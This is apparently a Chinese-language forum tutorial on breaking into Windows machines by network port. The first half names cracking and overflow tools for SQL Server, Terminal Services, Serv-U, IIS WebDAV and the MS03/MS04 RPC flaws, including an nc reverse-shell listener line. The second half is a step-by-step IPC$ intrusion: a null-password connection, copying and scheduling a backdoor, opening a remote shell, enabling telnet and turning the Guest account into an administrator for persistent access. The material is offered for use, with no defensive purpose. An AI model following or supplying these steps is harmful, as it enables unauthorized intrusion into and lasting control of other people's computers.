各個網絡端口的***

1. 1433端口***

scanport.exe 查有1433的機器

SQLScanPass.exe 進行字典暴破（字典是關鍵）

最後 SQLTools.exe***對sql的sp2及以下的系統，可用sql的hello 溢出漏洞***。

nc -vv -l -p 本機端口 sqlhelloF.exe ***ip 1433 本機ip 本機端口

（以上反向的，測試成功）

sqlhelloz.exe ***ip 1433 （這個是正向連接）

2. 4899端口***

用4899過濾器.exe，掃描空口令的機器

3. 3899的***

對很早的機器，可以試試3389的溢出(win3389ex.exe)

對2000的機器，可以試試字典暴破。(tscrack.exe)

4. 80***

對sp3以前的機器，可以用webdav***；

對bbs論壇，可以試試上傳漏洞（upfile.exe或dvup_delphi.exe）

可以利用SQL進行注入。（啊D的注入軟件）。

5. serv-u***(21端口）

對5. 004及以下系統，可用溢出***。（serv5004.exe）

對5.1.0.0及以下系統，可用本地提升權限。（servlocal.exe）

對serv-u的MD5加密密碼，可以用字典暴破。（crack.vbs）

輸入一個被serv-u加密的密碼（34位長），通過與字典檔（dict.txt）的比較，得到密碼

6. 554端口

用real554.exe***。

7. 6129端口

用DameWare6129.exe***。

8. 系統漏洞

利用135、445端口，用ms03026、ms03039、ms03049、ms04011漏洞，進行溢出***。

9. 3127等端口

可以利用doom病毒開的端口，用nodoom.exe***。（可用mydoomscan.exe查）。

10. 其他***

利用shanlu的***軟件***（WINNTAutoAttack.exe）。

經典IPC$***

1. C:\>net use $">\\127.0.0.1\IPC$ "" /user:"admintitrators"

這是用"流光"掃到的用戶名是administrators，密碼爲"空"的IP地址(氣好到家如果是打算***的話，就可以用這樣的命令來與127.0.0.1建立一個連接，因爲密碼爲"空"，所以第一個引號處就不用輸入，後面一個雙引號裏的是用戶名，輸入administrators，命令即可成功完成。

2. C:\>copy srv.exe $">\\127.0.0.1\admin$

先複製srv.exe上去，在流光的Tools目錄下就有（這裏的$是指admin用戶的c:\winnt\system32\，大家還可以使用c$、d$，意思是C盤與D盤，這看你要複製到什麼地方去了）。

3. C:\>net time \\127.0.0.1

查查時間，發現127.0.0.1 的當前時間是 2002/3/19 上午 11:00，命令成功完成。

4. C:\>at \\127.0.0.1 11:05 srv.exe

用at命令啓動srv.exe吧（這裏設置的時間要比主機時間快，不然你怎麼啓動啊.

5. C:\>net time \\127.0.0.1

再查查到時間沒有？如果127.0.0.1 的當前時間是 2002/3/19 上午 11:05，那就準備開始下面的命令。

6. C:\>telnet 127.0.0.1 99

這裏會用到Telnet命令吧，注意端口是99。Telnet默認的是23端口，但是我們使用的是SRV在對方計算機中爲我們建立一個99端口的Shell。

雖然我們可以Telnet上去了，但是SRV是一次性的，下次登錄還要再激活！所以我們打算建立一個Telnet服務！這就要用到ntlm了

7.C:\>copy ntlm.exe $">\\127.0.0.1\admin$

用Copy命令把ntlm.exe上傳到主機上（ntlm.exe也是在《流光》的Tools目錄中）。

8. C:\WINNT\system32>ntlm

輸入ntlm啓動（這裏的C:\WINNT\system32>指的是對方計算機，運行ntlm其實是讓這個程序在對方計算機上運行）。當出現"DONE"的時候，就說明已經啓動正常。然後使用"net start telnet"來開啓Telnet服務！

9. Telnet 127.0.0.1，接着輸入用戶名與密碼就進入對方了，操作就像在DOS上操作一樣簡單！(然後你想做什麼?想做什麼就做什麼吧,哈哈)爲了以防萬一,我們再把guest激活加到管理組

10. C:\>net user guest /active:yes

將對方的Guest用戶激活

11. C:\>net user guest 1234

將Guest的密碼改爲1234,或者你要設定的密碼

12. C:\>net localgroup administrators guest /add

將Guest變爲Administrator^_^(如果管理員密碼更改，guest帳號沒改變的話，下次我們可以用guest再次訪問這臺計算機)